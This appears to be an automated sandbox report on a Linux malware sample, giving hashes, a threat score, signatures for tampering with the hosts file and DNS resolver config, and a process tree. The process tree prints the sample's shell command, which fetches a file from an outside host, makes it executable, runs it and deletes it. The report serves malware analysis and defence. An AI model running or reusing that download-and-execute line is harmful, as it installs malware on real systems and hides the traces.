308148259618447239c14692ab3f05b7c52ff7bb61e8073a249397cbef5dc440

Analysis

max time kernel
17128s
max time network
148s
platform
linux_amd64
resource
ubuntu1804-amd64-en-20211208
submitted
24-06-2022 22:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

308148259618447239c14692ab3f05b7c52ff7bb61e8073a249397cbef5dc440
Size

101KB
MD5

766ea54734c7f6254c58fa9df2f3a55f
SHA1

d90f559443a35a8a246d6b16225c829a3c79cca0
SHA256

308148259618447239c14692ab3f05b7c52ff7bb61e8073a249397cbef5dc440
SHA512

6acb57b821a0a95c0b4ad1c448bc50631f7e1a0540c1eb0ba618acecef00ea02d7ae0376f8d9c0b7cf928d24ec85885d5794115860eb7f6358b1fa5d33ad4d93

Score

8^/10

Malware Config

Signatures

Modifies hosts file 1 IoCs

Adds to hosts file used for mapping hosts to IP addresses.

description	ioc	Process
/etc/hosts	/etc/hosts	wget

Writes DNS configuration 1 TTPs 1 IoCs

Writes data to DNS resolver config file.

Dynamic Resolution

T1568

description	ioc	Process
/etc/resolv.conf	/etc/resolv.conf	wget

./308148259618447239c14692ab3f05b7c52ff7bb61e8073a249397cbef5dc440
./308148259618447239c14692ab3f05b7c52ff7bb61e8073a249397cbef5dc440
1⤵
PID:593

/bin/sh
/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
1⤵
PID:594
- /usr/bin/wget
  wget -q http://gay.energy/.../vivid -O .....
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:598
- /bin/chmod
  chmod 777 .....
  2⤵
  PID:599
- ./.....
  ./.....
  2⤵
  PID:600
- /bin/sh
  /bin/sh ./.....
  2⤵
  PID:600
- /bin/rm
  rm -rf .....
  2⤵
  PID:602

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Dynamic Resolution

T1568

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads